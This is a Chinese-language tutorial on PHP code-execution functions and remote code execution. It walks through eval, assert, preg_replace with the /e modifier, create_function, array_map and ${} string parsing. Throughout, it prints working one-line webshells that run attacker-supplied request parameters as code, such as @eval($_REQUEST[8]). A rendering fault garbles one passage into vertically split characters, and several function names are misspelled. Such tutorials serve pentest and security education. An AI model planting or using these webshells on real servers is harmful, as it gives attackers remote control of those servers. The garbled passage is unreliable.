| 
 
 **  
php代码执行函数解析 
**  
?一、代码执行漏洞原理:  用户输入的数据被当做后端代码进行执行  <?php @eval($_REQUEST[8])?>//其实一句话木马的本质就是一个代码执行漏洞。用户输入的数据被当做代码进行执行。 
这里提一下RCE(remote command/code execute)远程命令或者代码执行。现在只要渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE  在PHP存在诸多函数可以做到代码执行。为了方便把要执行的代码写为$a  
1.eval($a); //eval是代码执行用的最多的,他可以多行执行  
eval(\$_REQUEST['a']);
  
2.assert($a); //只能单行执行  assert(\$_REQEUST['a'])//如何多行执行呢  写文件然后执行,例如:  
file_put_contents('1.php','<?php var_dump(8);phpinfo();?>')
  
3.preg_replace() //正则替换函数,  preg_replace(’/a/’,‘x’,‘abc’);  Eg  
<?php echo preg_replace('/a/e',$_GET[8],'abc')?>
  
替换必须真实发生才会触发函数,不发生替换,不会触发。  
4.creae_function() 匿名函数  $a = create_function(’$id’,‘echo $id;’);  echo 
    
     
      
       
        a
       
       
        (
       
       
        8
       
       
        )
       
       
        ;
       
       
        类
       
       
        似
       
       
        于
       
       
        f
       
       
        u
       
       
        n
       
       
        c
       
       
        t
       
       
        i
       
       
        o
       
       
        n
       
       
        函
       
       
        数
       
       
        名
       
       
        (
       
      
      
       a(8); 类似于 function函数名(
      
     
    a(8);类似于function函数名(id){echo $id;}  
<?php
\$a = $_REQUEST['a'];
$f2 = create_function('',$a);
$f2();
?>
  
这里还可以不调用触发:  
<?php
\$a = $_REQUEST['a'];
$f2 = create_function('',$a);
  
5.array_map //回调函数调用某个函数。  下图是这个函数的用法,调用cube函数,传参     
一句话木马:  
array_map('assert',array($_POST['a']));
array_map($_REQUSET['b'],$_REQUEST);
  
Eval 是无法调用的,因为eval比较特殊,不认为是函数属于特殊写法  call_user_func() 也可以回调,回调函数在php有很多。  
6.特殊组合(双引号二次解析)  PHP版本5.5及其以上版本可以使用  “${phpinfo()}”; => 代码执行phpinfo()  php的字符串是可以使用复杂的表达式。例如${中间可以写调用的函数}  
${phpinfo()};
$a = ${phpinfo()};
 
                
                
                
        
        
    
  
 
 |